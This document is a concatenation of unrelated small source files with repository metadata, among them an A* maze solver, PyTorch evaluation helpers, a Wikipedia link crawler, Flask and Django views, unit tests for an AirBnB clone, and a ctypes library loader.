self.upTree[node] = -1
def find(self, node): # Return the root
if type(self.upTree[node]) == int and self.upTree[node] < 0:
return node
root = self.find(self.upTree[node])
self.upTree[node] = root # Path compression
return root
def setunion(self, a, b):
rootA = self.find(a)
rootB = self.find(b)
sizeA = self.upTree[rootA]
sizeB = self.upTree[rootB]
newSize = sizeA + sizeB
if sizeA <= sizeB:
self.upTree[rootB] = rootA
self.upTree[rootA] = newSize
else:
self.upTree[rootA] = rootB
self.upTree[rootB] = newSize
def size(self, elem):
root = self.find(elem)
return -1*self.upTree[root]
def Find_Mst(unvisited_obj, MST_table, Manhatten_table):
#Find MST using Kruskal's algorithm
if not unvisited_obj:
return 0
if frozenset(unvisited_obj) in MST_table:
return MST_table[frozenset(unvisited_obj)]
path_cost = PriorityQueue()
total_path_cost = 0
path_collection = []
node_set = dset()
#Build up the Priority queue and disjoint set
for i in range(len(unvisited_obj)):
node_set.addelement(unvisited_obj[i])
for j in range(i+1, len(unvisited_obj)):
dist = Manhatten_table[(unvisited_obj[i], unvisited_obj[j])]
path_cost.put((dist, (unvisited_obj[i], unvisited_obj[j])))
#Compute MST using customed disjoint set data structure
while node_set.size(unvisited_obj[0]) != len(unvisited_obj):
cur_path = path_cost.get()
node0 = list(cur_path[1])[0]
node1 = list(cur_path[1])[1]
if node_set.find(node0) == node_set.find(node1):
continue
node_set.setunion(node0, node1)
total_path_cost += cur_path[0]
path_collection.append(cur_path[1])
#Cache Value
#Cache total_path_cost
MST_table[frozenset(unvisited_obj)] = total_path_cost
return total_path_cost
def Compute_Manhatten(unvisited_obj, maze):
Manhatten_table = {}
#Find pairs of Manhatten distance
#Store them in a table for later use
for i in range(len(unvisited_obj)):
for j in range(len(unvisited_obj)):
if i != j:
Manhatten_table[(unvisited_obj[i], unvisited_obj[j])] = bfs_in_two(maze, unvisited_obj[i], unvisited_obj[j])
return Manhatten_table
def Heu_Multi(curNode, unvisited_obj, Manhatten_table, MST_table, maze):
#Find the heuristic for multi obj. problem
#Heuristic: Manhatten Distance to the nearest unvisited city + total length of MST of unvisited cities
#First, we find the MST total length
mst_length = Find_Mst(unvisited_obj, MST_table, Manhatten_table)
if not unvisited_obj:
near_dist = 0
else:
near_dist = min([bfs_in_two(maze, x, curNode) for x in unvisited_obj])
return mst_length + near_dist - 1
def astar_multi(maze):
frontier = []
visited = []
prev = {}
objs = tuple(maze.getObjectives())
start = maze.getStart()
MST_table = {}
Manhatten_table = Compute_Manhatten(list(objs), maze)
f_init = Heu_Multi(start, list(objs), Manhatten_table, MST_table, maze)
initState = (start, objs, 0)
heapq.heappush(frontier, (f_init, initState))
prev[initState] = None
while True:
cur_state = heapq.heappop(frontier)[1]
cur_node = cur_state[0]
cur_objs = cur_state[1]
#print(len(cur_objs))
cur_g = cur_state[2]
if len(list(cur_objs)) == 0:
path = []
ite = cur_state
while ite is not None:
path.insert(0, ite[0])
ite = prev[ite]
return path
visited.append(cur_state)
for node in maze.getNeighbors(cur_node[0], cur_node[1]):
new_g = cur_g + 1
new_objs = cur_objs[:]
if node in cur_objs:
listx = list(new_objs)
listx.remove(node)
new_objs = tuple(listx)
reached_state = (node, new_objs, new_g)
new_f = new_g + Heu_Multi(node, new_objs,Manhatten_table,MST_table,maze)
flag = 0
for i in range(len(frontier)):
to_state = frontier[i][1]
if to_state[0] == node and to_state[1] == new_objs:
if new_g < to_state[2]:
frontier[i] = (new_f, reached_state)
prev[reached_state] = cur_state
heapq.heapify(frontier)
flag = 1
break
if flag:
continue
for visited_state in visited:
if visited_state[0] == reached_state[0] and visited_state[1] == reached_state[1]:
if visited_state[2] > reached_state[2]:
heapq.heappush(frontier, (new_f, reached_state))
visited.remove(visited_state)
prev[reached_state] = cur_state
flag = 1
break
if flag:
continue
heapq.heappush(frontier, (new_f, reached_state))
prev[reached_state] = cur_state
return
def extra(maze):
return
|
[
"xs15@illinois.edu"
] |
xs15@illinois.edu
|
|
010c9fb88bc98f634230f8508b1d8996b3358a35
|
4e2e7825256a61f8a7cfe9bf73ef954e81c0b443
|
/HW2/utils/postprocess.py
|
1c6ac18b3a85b5e903f19c6a0f29b65e5c89812e
|
[] |
no_license
|
jonahthelion/cs287-s18
|
1155666b4f90b88b28c3ada94cd4147b56573168
|
b7e9f876edfcf5e933f8c8077590afc72d1fb615
|
refs/heads/master
| 2021-05-08T20:35:39.686276
| 2018-12-02T01:30:52
| 2018-12-02T01:30:52
| 119,612,436
| 0
| 0
| null | 2018-01-31T00:31:18
| 2018-01-31T00:31:17
| null |
UTF-8
|
Python
| false
| false
| 2,447
|
py
|
import torch
import torch.nn.functional as F
import torchtext
from torch.autograd import Variable
import numpy as np
from tqdm import tqdm
def evaluate(model, test_iter):
all_actuals = []
all_preds = []
for batch in tqdm(test_iter):
all_preds.extend(model.predict(batch.text[:-1].cuda()).cpu())
all_actuals.extend(batch.text[-1])
all_actuals = torch.stack(all_actuals).squeeze()
all_preds = torch.stack(all_preds)
_,top_ranks = all_preds.data.topk(20,1)
dotted = 1./torch.arange(1, 21)
MAP = []
for row_ix in range(len(all_actuals)):
vals = (all_actuals[row_ix].data == top_ranks[row_ix]).float()
MAP.append((vals * dotted).sum())
return np.mean(MAP)
def write_submission(model, fout, TEXT):
print("writing submission", fout)
test = torchtext.datasets.LanguageModelingDataset(path="PSET/input.txt",text_field=TEXT)
samples = [row.rstrip().split(" ") if row_ix == 0 else row.rstrip().split(" ")[1:] for row_ix,row in enumerate(' '.join(test[0].text).split('___ <eos>'))][:-1]
samples = torch.stack([torch.Tensor([TEXT.vocab.stoi[ix] for ix in row]).long() for row in samples], 1)
preds = model.predict ( Variable(samples).cuda() ).cpu()
_,top_ranks = preds.data.topk(20,1)
with open(fout, 'w') as writer:
writer.write('id,word\n')
for row_ix,row in enumerate(top_ranks):
writer.write(str(row_ix+1) + ',')
for counter,word_ix in enumerate(row):
if counter != len(row) - 1:
writer.write(str(TEXT.vocab.itos[word_ix]) + ' ')
else:
writer.write(str(TEXT.vocab.itos[word_ix]) + '\n')
return samples, top_ranks
def vis_display(vis, vis_windows, x_coord, train_l, MAP):
if vis_windows is None:
vis_windows = {}
vis_windows['train_ce'] = vis.line(Y=torch.Tensor([float(train_l)]), X=torch.Tensor([x_coord]), opts=dict(title='Train CE'))
vis_windows['val_ce'] = vis.line(Y=torch.Tensor([float(MAP)]), X=torch.Tensor([x_coord]), opts=dict(title='Validation MAP'))
else:
vis.line(Y=torch.Tensor([float(train_l)]), X=torch.Tensor([x_coord]), win=vis_windows['train_ce'], update='append', opts=dict(title='Train CE'))
vis.line(Y=torch.Tensor([float(MAP)]), X=torch.Tensor([x_coord]), win=vis_windows['val_ce'], update='append', opts=dict(title='Validation MAP'))
return vis_windows
|
[
"jonahphilion@Jonahs-MacBook-Pro-4.local"
] |
jonahphilion@Jonahs-MacBook-Pro-4.local
|
e9d2229197117983d242e32952964303341a0ea9
|
31023b59e743b5bef1c2c935dc1f2b26e8e10e9b
|
/文件操作/file_5.py
|
3d47006044ce188324a2f2d6c38244e91fc3a632
|
[] |
no_license
|
hsyy673150343/PythonLearning
|
417650d8ab5dbafbede08ef40223b29e82738443
|
817c6bd4c2ecba2549fa0be9f0c41337fe5acfdf
|
refs/heads/master
| 2020-05-18T06:36:25.648709
| 2019-05-23T13:40:59
| 2019-05-23T13:40:59
| 184,239,403
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 235
|
py
|
#!/usr/bin/env python
# -*- coding:utf8 -*-
# @TIME : 11:20
# @Author : 洪松
# @File : file_5.py
'''
with方法:会自动关闭文件
'''
with open('小重山山','r',encoding='utf-8') as file:
print(file.read())
|
[
"13096337080@163.com"
] |
13096337080@163.com
|
67bb96a5e1042e33591a00351fdc8554ba0f588e
|
3c7e0854faca88cd7b1b390323a81b3e6d8a902e
|
/blinkenlight.py
|
47c82bf2ab03ae55738d8b64085b88a4ee922fd7
|
[] |
no_license
|
penguin-grenade/Pinballcohol
|
0a67a7ac8e42c6107d7792a664eab067f547166f
|
3b98a00284b17002c8362815a87c99874bf25f08
|
refs/heads/master
| 2020-04-05T17:06:19.676851
| 2018-11-11T03:48:19
| 2018-11-11T03:48:19
| 157,044,765
| 0
| 0
| null | 2018-11-11T03:44:37
| 2018-11-11T03:44:37
| null |
UTF-8
|
Python
| false
| false
| 130
|
py
|
import gpiozero as pi
from time import sleep
led = pi.LED(17)
while True:
led.on()
sleep(1)
led.off()
sleep(1)
|
[
"pseudoboss11@gmail.com"
] |
pseudoboss11@gmail.com
|
d27ded37cb89d6e428fab989e1fcbb4876d8735d
|
98cc7697985f78326b8065bce7955bef3c6f802c
|
/findPaths.py
|
806467b09e4eb9760f7edd0e1dbaa17ac49dadca
|
[] |
no_license
|
eswardhinak/WikipediaGame
|
86c19808678999d3f4efc30f096c1d21bc389251
|
393ec90ac92b6822ec673686ac0b5e105d840ced
|
refs/heads/master
| 2021-07-08T09:24:14.899386
| 2021-04-22T02:43:01
| 2021-04-22T02:43:01
| 31,444,976
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,648
|
py
|
'''
Name: findPaths
Description: This module does the searching for the end article using a BFS.
'''
import re
from lxml import html
import requests
from sets import Set
import Queue
import WikiNode
import time
import random
visited = Set([]) #set of visited articles
web = dict({}) #hashtable of visited WikiNodes
defList = []
'''
Name: findPaths(current_article, end_article)
current_article -- starting article
end_article -- destination article
Description: Breadth first search to find the destination article
'''
def findPaths(current_article, end_article):
global web
global defList
end_article_spaces = end_article
current_article = current_article.replace(' ', '_')
end_article = end_article.replace(' ', '_')
wiki_link_start = "http://en.wikipedia.org/wiki/" + current_article
page=requests.get(wiki_link_start)
tree=html.fromstring(page.text)
links=tree.xpath('//p//a/@href')
if (len(links) < 2):
links = tree.xpath('//a/@href')
list_of_words = end_article_spaces.split()
nonExistString = "Wikipedia does not have an article with this exact name."
for item in list_of_words:
currLink = "http://en.wikipedia.org/wiki/" + item
page = requests.get(currLink)
if (page.status_code >= 400): #if valid link
list_of_words.remove(item)
start_art_wiki = "/wiki/" + current_article
global visited
visited.add(start_art_wiki)
end_art_wiki = "/wiki/" + end_article
textLinks = tree.xpath('//a/text()')
if end_article_spaces in textLinks:
print "Found."
return
if end_art_wiki in links:
print "Found."
return
wiki_link_end = "http://en.wikipedia.org" + end_art_wiki
page_end = requests.get(wiki_link_end)
tree_end = html.fromstring(page_end.text)
links_end = tree_end.xpath('//p//a/@href')
if (len(links_end)<2):
links_end = tree_end.xpath('//a/@href')
k = 0
m = 0
links_Queue = Queue.Queue()
for item in list_of_words:
addLink = "/wiki/" + item
defList.append(addLink)
while k < 2:
if (m < len(links_end)):
if (isValidLink(links_end[m])):
defList.append(links_end[m])
k=k+1
m=m+1
else:
m=m+1
else:
break
print "-----------------------------------"
print "This is what I know about " + end_article + ": "
for item in defList:
prstring = item + ", "
print prstring
print "-----------------------------------"
time.sleep(3)
i=0
j=0
count=0
for item in defList:
if item in links:
if (isValidLink(item)):
visited.add(item)
links_Queue.put(item)
currentNode = WikiNode.WikiNode(start_art_wiki, item)
web[item] = currentNode
count = count + 1
while i<2:
if (j<len(links)):
if (isValidLink(links[j])):
visited.add(links[j])
links_Queue.put(links[j])
currentNode = WikiNode.WikiNode(start_art_wiki, links[j])
web[links[j]] = currentNode
i=i+1
i=i+1
else:
j=j+1
else:
break
start = WikiNode.WikiNode("-1", start_art_wiki)
web[start_art_wiki] = start
BFS(links_Queue, end_article, end_article_spaces)
#breadth first search
def BFS(queue_links, end_article, end_article_spaces):
global visited
global web
global defList
end_article = "/wiki/" + end_article
while not queue_links.empty():
current_article = queue_links.get()
print current_article + " " + end_article
if (current_article == end_article):
print "Found."
return
else:
search_link = "http://en.wikipedia.org" + current_article
try:
page = requests.get(search_link)
except requests.ConnectionError:
continue
tree = html.fromstring(page.text)
allinks = tree.xpath('//a/@href')
links = tree.xpath('//p//a/@href')
textLinks = tree.xpath('//p//a/text()')
if end_article_spaces in textLinks:
print end_article_spaces
for item in textLinks:
print item
for item in allinks:
print item
'''f = open('final_article', 'w')
for item in textLinks:
f.write(item)
f.close()'''
print "Found."
print "_______"
printPath(end_article, current_article)
return
if end_article in links:
print end_article_spaces
for item in textLinks:
print item
for item in allinks:
print item
'''f = open('final_article', 'w')
for item in textLinks:
f.write(item)
f.close()'''
print "Found."
print "_______"
printPath(end_article, current_article)
return
i=0
j=0
count=0
for item in defList:
if item in links:
if (isValidLink(item)):
visited.add(item)
queue_links.put(item)
currentNode = WikiNode.WikiNode(current_article, item)
web[item] = currentNode
count = count + 1
while i<2:
#index = int(random.random() * len(links))
index = j
if (index <len(links)):
if (isValidLink(links[index])):
visited.add(links[index])
queue_links.put(links[index])
current = WikiNode.WikiNode(current_article, links[index])
web[links[index]] = current
i=i+1
j=j+1
else:
j=j+1
else:
break
#Function to use to get page in bad connection situations
def getPage(search_link):
try:
page = requests.get(search_link)
return page
except requests.ConnectionError:
time.sleep(1)
return getPage(search_link)
#function that uses WikiNodes to print the path taken once destination article is found
def printPath(end_article, article):
global web
currNode = web[article]
parent = currNode.parent
stack = []
stack.append(currNode)
while (parent != "-1"):
currNode = web[parent]
stack.append(currNode)
parent = currNode.parent
while (len(stack)!=0):
currNode = stack.pop()
print currNode.name
print " ---> "
print end_article
#function that checks if a given link is valid
def isValidLink(link):
global visited
search_link = "http://en.wikipedia.org" + link
if (link in visited):
return False
if (link[0]=='#'):
return False
if (link[:2]=='//'):
return False
link_without_wiki=link[6:]
if (link_without_wiki[:5] == 'Help:'):
return False
if (link_without_wiki[:5] == 'File:'):
return False
if (link[:5] == 'http:'):
return False
if ("%" in link):
return False
bad_strings = []
bad_strings.append("disambiguation")
bad_strings.append("Protection_policy")
bad_strings.append("Requests_for_page_protection")
bad_strings.append("Template_messages")
bad_strings.append("Editnotices")
bad_strings.append("Wikipedia:")
bad_strings.append("Template")
bad_strings.append("Free_content")
bad_strings.append("Logo_of_Wikipedia")
bad_strings.append("Content")
bad_strings.append("Portal")
bad_strings.append("Talk:")
bad_strings.append("index.php")
for bad in bad_strings:
if bad in link:
return False
return True
|
[
"edhinaka@ucsd.edu"
] |
edhinaka@ucsd.edu
|
77ef1479e8e71997ee5731680e282867e443c25f
|
fb40da02fbcb7ee3996a52315c945c81ab5d82a5
|
/main.py
|
5b2291fa59d8c243f8d2084a4a2ead120cec4498
|
[] |
no_license
|
mkaminsky11/LOLClub
|
47688fbb2ee542b1d6022ef98459a288e1a89364
|
37f0a913db85888ac37ddcfffeb163e735c83e7a
|
refs/heads/master
| 2021-01-12T11:46:51.751851
| 2016-09-19T03:33:46
| 2016-09-19T03:33:46
| 67,903,147
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 679
|
py
|
from flask import Flask, render_template, request
import json
app = Flask(__name__)
@app.route('/')
def index(user=None):
return render_template('index.html')
@app.route('/people')
def people(user=None):
f = open('people.json', 'r')
json_raw = f.read()
json_decoded = json.loads(json_raw)
return render_template('people.html', people=json_decoded['people'])
@app.route('/events')
def events(user=None):
return render_template('events.html')
@app.route('/contact')
def contact(user=None):
return render_template('contact.html')
@app.route('/<path:path>')
def static_proxy(path):
return app.send_static_file(path)
if __name__ == '__main__':
app.run()
|
[
"mkaminsky11@gmail.com"
] |
mkaminsky11@gmail.com
|
e7bdbb7033d3ec8664635d8b99cde65cc7c7adce
|
8247d8a41b83318adb7dcb6180ec0d440f3de953
|
/98_validateBinarySearchTree/sol2.py
|
22404be25eb3c2de07cbec2e6a655cbe11110cf0
|
[] |
no_license
|
weichungw/meishiTackling
|
8009446beab388ff921da3ee7e6baf801e6aee21
|
d204fd293d811dd5d107bbc5cc0d921a4b8cfdf3
|
refs/heads/master
| 2021-09-07T21:23:16.739494
| 2018-03-01T09:13:12
| 2018-03-01T09:13:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 165
|
py
|
class TreeNode:
def __init__(self,x):
self.val=x
self.left=None
self.right=None
class Solution:
def isValidBST(self, root):
|
[
"thecamelyouknow@gmail.com"
] |
thecamelyouknow@gmail.com
|
f6978f575bf64d88a52ba0b2a7be7931cc019f04
|
fa8a1d118fb311043df7ce31242002c63f555cc2
|
/lib/hook/__init__.py
|
96d71f754bf7fa79919a5570aec9c8ed8716f1d3
|
[
"MIT"
] |
permissive
|
kuro2a/kiku
|
9f48d7bf2e66d273a5adb88ab1ca1634ff2a92ee
|
d4e6500970a20d1955f1773e0e2cfb8e2db819ba
|
refs/heads/master
| 2022-11-16T23:12:23.198173
| 2020-06-25T15:32:06
| 2020-06-25T15:32:06
| 198,195,299
| 2
| 2
|
NOASSERTION
| 2020-06-25T15:32:07
| 2019-07-22T09:53:27
|
Python
|
UTF-8
|
Python
| false
| false
| 53
|
py
|
#!/usr/bin/python3
from lib.hook.validation import *
|
[
"redagma2+dev@gmail.com"
] |
redagma2+dev@gmail.com
|
de49719e99a274ae9898c2bddee78fa0a2aaf49d
|
593472fe5926ca8ee25bfdacc15302622a73c422
|
/tests/test_models/test_base_model.py
|
a03d9c227ac8132c6db2afa3823c051bd54a65f6
|
[
"LicenseRef-scancode-public-domain"
] |
permissive
|
oomsebas/AirBnB_clone
|
a25ecd6f3d68a79b9ca7ca413b0d9cb0d12562ac
|
fb58928de93ab741edb236ec2ea160ec6da678c0
|
refs/heads/main
| 2023-01-21T00:09:52.766043
| 2020-11-21T20:03:25
| 2020-11-21T20:03:25
| 308,455,479
| 0
| 1
| null | 2020-11-21T20:03:26
| 2020-10-29T21:36:17
|
Python
|
UTF-8
|
Python
| false
| false
| 5,638
|
py
|
#!/usr/bin/python3
"""
Unitest Class BaseModel
"""
import unittest
from models.base_model import BaseModel, __doc__ as mrdoc
import inspect
import models
from datetime import datetime as datetime
"""import pep8"""
class TestBaseModel(unittest.TestCase):
"""
Unitest for testing
"""
def test_module_docstring(self):
"""
Tests docstring for module
"""
self.assertTrue(len(mrdoc) > 20)
def test_class_docstring(self):
"""
Tests docstring for class
"""
self.assertTrue(len(BaseModel.__doc__) > 20)
def test_methods_docstring(self):
"""
Tests docstring for methods
"""
methods = inspect.getmembers(BaseModel, predicate=inspect.ismethod)
for name, func in methods:
self.assertTrue(len(func.__doc__) > 20)
def test_docstring_for_test(self):
"""
Tests docstring for this test
"""
self.assertTrue(len(__doc__) > 20)
def test_docstring_class_test(self):
"""
Tests dosctring for class TestBaseModel
"""
self.assertTrue(len(TestBaseModel.__doc__) > 20)
def test_docstring_methods(self):
"""
Tests docstring for all methods in TestBaseModel class
"""
methods = inspect.getmembers(TestBaseModel, predicate=inspect.ismethod)
for name, func in methods:
self.assertTrue(len(func.__doc__) > 20)
"""def test_pep8(self):
\"""
Tests for PEP-8
""\"
pep8style = pep8.StyleGuide(quiet=True)
result = pep8style.check_files(["models/base_model.py"])
self.assertEqual(result.total_errors, 0)"""
def test_base_init(self):
"""
Testing a class BaseModel
"""
instance = BaseModel()
self.assertIsInstance(instance, BaseModel)
self.assertTrue(issubclass(type(instance), BaseModel))
self.assertIs(type(instance), BaseModel)
instance.name = "Holberton"
instance.my_number = 89
self.assertEqual(instance.name, "Holberton")
self.assertEqual(instance.my_number, 89)
"""
at_class = {
"id": str,
"created_at": datetime
"updated_at": datetime
"name": str
"my_number": int
}
"""
def test_none(self):
"""Check if a new instance is not none"""
bm1 = BaseModel()
self.assertIsNotNone(bm1)
def test_uuid(self):
"""Check ids in the created instances"""
bm1 = BaseModel()
bm2 = BaseModel()
self.assertTrue(hasattr(bm1, "id"))
self.assertNotEqual(bm1.id, bm2.id)
def test_created_at(self):
"""Check if the instance has created_at Atttibute"""
bm1 = BaseModel()
bm2 = BaseModel()
self.assertTrue(bm1, "created_at")
self.assertTrue(bm2, "created_at")
def test_updated_at(self):
"""Check if the instance has created_at Atttibute"""
bm1 = BaseModel()
bm2 = BaseModel()
self.assertTrue(bm1, "updated_at")
self.assertTrue(bm2, "updated_at")
def test__str__(self):
"""Check the string of an created instance"""
bm1 = BaseModel()
printed = "[{}] ({}) {}".format(
bm1.__class__.__name__, bm1.id, bm1.__dict__)
self.assertEqual(str(bm1), printed)
def test_to_dict(self):
"""Test the to_dict method from BaseModel"""
bm1 = BaseModel()
bm1_dict = bm1.to_dict()
self.assertIsInstance(bm1_dict, dict)
self.assertEqual(bm1_dict["__class__"], "BaseModel")
self.assertEqual(str(bm1.id), bm1_dict["id"])
self.assertIsInstance(bm1_dict["created_at"], str)
self.assertIsInstance(bm1_dict["updated_at"], str)
def test_save(self):
"""Test to check each update in the storage"""
bm1 = BaseModel()
self.assertTrue(hasattr(bm1, "updated_at"))
bm1.save()
self.assertTrue(hasattr(bm1, "updated_at"))
t_arg = {'id': 'b6a6e15c-c67d-4312-9a75-9d084935e579',
'create_at': datetime(2017, 9, 28, 21, 5, 54, 119427),
'updated_at': datetime(2017, 9, 28, 21, 5, 54, 119572),
'name': 'bm1'}
bm2 = BaseModel(t_arg)
bm2.save()
last_time = bm2.updated_at
bm2.save()
self.assertNotEqual(last_time, bm2.updated_at)
def test_init_from_dict(self):
"""test to check a new instance witk Kwargs"""
my_dict = {'id': '56d43177-cc5f-4d6c-a0c1-e167f8c27337',
'created_at': '2017-09-28T21:03:54.052298',
'__class__': 'BaseModel', 'my_number': 89,
'updated_at': '2017-09-28T21:03:54.052302',
'name': 'Holberton'}
bm1 = BaseModel(**my_dict)
self.assertIsInstance(bm1, BaseModel)
self.assertIsInstance(bm1.id, str)
self.assertEqual(bm1.id, '56d43177-cc5f-4d6c-a0c1-e167f8c27337')
self.assertIsInstance(bm1.created_at, datetime)
self.assertIsInstance(bm1.updated_at, datetime)
self.assertIsInstance(bm1.name, str)
self.assertEqual(bm1.name, 'Holberton')
self.assertEqual(
bm1.created_at.isoformat(), '2017-09-28T21:03:54.052298')
self.assertEqual(
bm1.updated_at.isoformat(), '2017-09-28T21:03:54.052302')
def test_new_attributte(self):
"""test to check if new attribute can be added"""
bm1 = BaseModel()
bm1.name = "Betty"
self.assertEqual(bm1.name, "Betty")
|
[
"1843@holbertonschool.com"
] |
1843@holbertonschool.com
|
86b7a090def5e072694f4e756109666c1df9a149
|
be3ec8731040b7bafabdf7ca873ce3b3bdcd2e73
|
/partB.py
|
c332224ad26dbf9e3ee69f3c6d7730cec89e89aa
|
[] |
no_license
|
philipandreadis/InfoRetrivalProject
|
7a863f85e3c31f7f8aafc7b49b5795606f4d3cd9
|
0b7770e2a926597e0b4425df61587db9e3f74b71
|
refs/heads/master
| 2020-04-15T02:38:00.473075
| 2019-02-10T17:48:12
| 2019-02-10T17:48:12
| 164,321,244
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,309
|
py
|
from partA import binaryVector
import csv
import math
from collections import Counter
import numpy
th = 0.8 # threshold for most similar pairs
m = 100 # number of pairs to be tested
# Defines pairs with similarity over a threshold
# Returns a list with the most common pairs
def mostCommon(model,th):
threshold = th
commonPairs = []
for i in range(1,len(lines)):
if lines[i][model]>=threshold:
commonPairs.append(lines[i])
return commonPairs
lines = []
# Csv file processing
with open("train_original.csv", encoding="utf8") as f:
reader = csv.reader(f, delimiter=",")
c = 0
for i, line in enumerate(reader):
lines.append(line)
if i > m:
break
# Lines iteration
for i in range(1,len(lines)):
s1 = lines[i][3]
s2 = lines[i][4]
#string preprocessing
s1 = s1.lower()
s2 = s2.lower()
s1 = s1.strip('?')
s2 = s2.strip('?')
# Calculate binary similarity
bsim = binaryVector(s1, s2)
lines[i].append(bsim)
cpairs = mostCommon(6, th)
print("Pair of questions with similarity probability over {}:\n".format(th))
for i in range(len(cpairs)):
print("id:{} \n question1: {} \n question2: {} \n binary vector sim probability: {}\n".format(cpairs[i][0],cpairs[i][3],cpairs[i][4],cpairs[i][6]))
|
[
"filipposa@csd.auth.gr"
] |
filipposa@csd.auth.gr
|
416e9f7365cafcf893ebd9b1b3af65e9a7ac351e
|
8244cba1e34d8d2f7acfa414828b709a0d62c3a1
|
/extra_apps/django_celery_results/migrations/0004_auto_20181127_0928.py
|
1b4ee91d58d0c49aa7584b11c0a140c7cec08d9e
|
[] |
no_license
|
nightqiuhua/ScraperManager
|
96fd21bc0b8442a76fcc615e66505b93591fcce8
|
b037e6347eda64df05d0a1496bae4fb3124d6ff4
|
refs/heads/master
| 2020-08-18T05:50:15.484878
| 2018-11-29T09:37:02
| 2018-11-29T09:37:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 505
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2018-11-27 01:28
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('django_celery_results', '0003_auto_20181106_1101'),
]
operations = [
migrations.AlterModelOptions(
name='taskresult',
options={'ordering': ['-date_done'], 'verbose_name': '任务结果', 'verbose_name_plural': '任务结果'},
),
]
|
[
"157571283@163.com"
] |
157571283@163.com
|
c2717850684ae720aca6cea890c073ce1c71dc45
|
2c3e6390fd02d888720f6a01679e63e0603ba128
|
/Python/Algorithms/Strings/Sherlock_and_the_Valid_String/solution.py
|
70860cfc4d6e9c6696fbc56fdbd1b66608b7d7ef
|
[] |
no_license
|
dileepmenon/HackerRank
|
ab39a7a6e40308a09bb7c3f644e4c8c1883a493c
|
07e4627e5507561f82df055b925a19833d88d258
|
refs/heads/master
| 2021-01-11T17:51:34.323145
| 2019-01-21T12:02:11
| 2019-01-21T12:02:11
| 79,847,239
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 710
|
py
|
#!/bin/python3
import sys
def isValid(s):
alpha_coun = []
for i in set(s):
alpha_coun.append(s.count(i))
a = list(set(alpha_coun))
if len(a) > 2:
return 'NO'
else:
if len(a) == 2:
a1_coun = alpha_coun.count(a[0])
a2_coun = alpha_coun.count(a[1])
if a1_coun == 1 or a2_coun == 1:
if abs(a[1] - a[0]) == 1:
return 'YES'
elif a[0] == 1 or a[1] == 1:
return 'YES'
else:
return 'NO'
else:
return 'NO'
else:
return 'YES'
s = input().strip()
result = isValid(s)
print(result)
|
[
"dileepmenon92@yahoo.com"
] |
dileepmenon92@yahoo.com
|
f20c06591cf4e72459e41d04268c3ab6d0ea7fc7
|
87876df58b20026cb79607c6ef40fc3b51928cd1
|
/contact/views.py
|
25ebc44774d32ff2b5c919c713f8d06d7a8f37f8
|
[] |
no_license
|
howa3204/kanaboard-app
|
7c530adfdda49b0ecf82b533ee47935666e28251
|
07383714b02c9bfa767c69240c98e5fcfd59751a
|
refs/heads/main
| 2023-08-19T10:27:11.835488
| 2021-09-22T06:53:07
| 2021-09-22T06:53:07
| 371,836,182
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,170
|
py
|
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.core.mail import EmailMessage
from django.shortcuts import render
# Create your views here.
@login_required(login_url='authentication:login')
def contact(request):
if request.method == "POST":
subject = request.POST['subject']
body = request.POST['body']
from_email = ['support@kanaboard.com']
reply_to = request.POST['reply_to']
context = {'subject':subject,
'body':body,
'reply_to':reply_to,
}
email = EmailMessage(
subject=subject,
body=body,
from_email='support@kanaboard.com',
to=['support@kanaboard.com'],
reply_to=[reply_to],
headers={'username': request.user.username},
)
email.send(fail_silently=False)
messages.success(request, "Message recieved! We'll get back to you shortly.")
return render(request, 'contact/contact.html', context)
else:
context = {}
return render(request, 'contact/contact.html', context)
|
[
"jordan@kanaboard.com"
] |
jordan@kanaboard.com
|
00b1230c16298db372c1cec1696b6a7c7f0b3d28
|
77f65ea86ebc544c3f3e66c0152086e45669068c
|
/ch03-lists-tuples/e12b2_popular_shells.py
|
28857e7cfb335dd083ca73655a30cbaa88837470
|
[] |
no_license
|
Cptgreenjeans/python-workout
|
e403f48b0694ff4db32fe5fc3f87f02f48a1a68e
|
b9c68520d572bf70eff8e554a8ee9c8702c88e6e
|
refs/heads/master
| 2023-07-16T21:49:14.198660
| 2021-08-29T13:49:12
| 2021-08-29T13:49:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 445
|
py
|
#!/usr/bin/env python3
"""Solution to chapter 3, exercise 12, beyond 2: shells_by_popularity"""
from collections import Counter
import operator
def shells_by_popularity(filename):
shells = Counter(one_line.split(':')[-1].strip()
for one_line in open(filename)
if not one_line.startswith(('#', '\n')))
return sorted(shells.items(),
key=operator.itemgetter(1), reverse=True)
|
[
"reuven@lerner.co.il"
] |
reuven@lerner.co.il
|
e7e6fd6c76c5449391e9213cb9992619f91deada
|
84721ed008c94f2c7351c63a6dd23d4107efcce0
|
/vimlite/VimLite/CxxParser.py
|
c6368a94d50ec070d3f1e558ff5391212fcd1900
|
[] |
no_license
|
vim-scripts/VimLite
|
17277b09a208d437d0b3a5e514b483bc5301ee4f
|
cd00cb17d98efed12e1e364dae8676101394f135
|
refs/heads/master
| 2016-09-07T18:50:25.672256
| 2013-01-25T00:00:00
| 2013-01-28T02:41:31
| 1,970,791
| 8
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,202
|
py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
from ctypes import *
import os.path
def GetCharPStr(charp):
i = 0
l = []
while charp[i] != '\0':
l.append(charp[i])
i += 1
return ''.join(l)
def GetLibCxxParser():
'''通过 sys.argv[1] 传递库路径'''
import platform
OSName = platform.system()
try:
import vim
import sys
#print sys.argv
library = sys.argv[1]
return CDLL(library)
except:
return CDLL(os.path.expanduser("~/libCxxParser.so"))
libCxxParser = GetLibCxxParser()
CxxHWParser_Create = libCxxParser.CxxHWParser_Create
CxxHWParser_Create.restype = c_void_p
CxxHWParser_Create.argtypes = [c_char_p]
CxxHWParser_Destroy = libCxxParser.CxxHWParser_Destroy
CxxHWParser_Destroy.argtypes = [c_void_p]
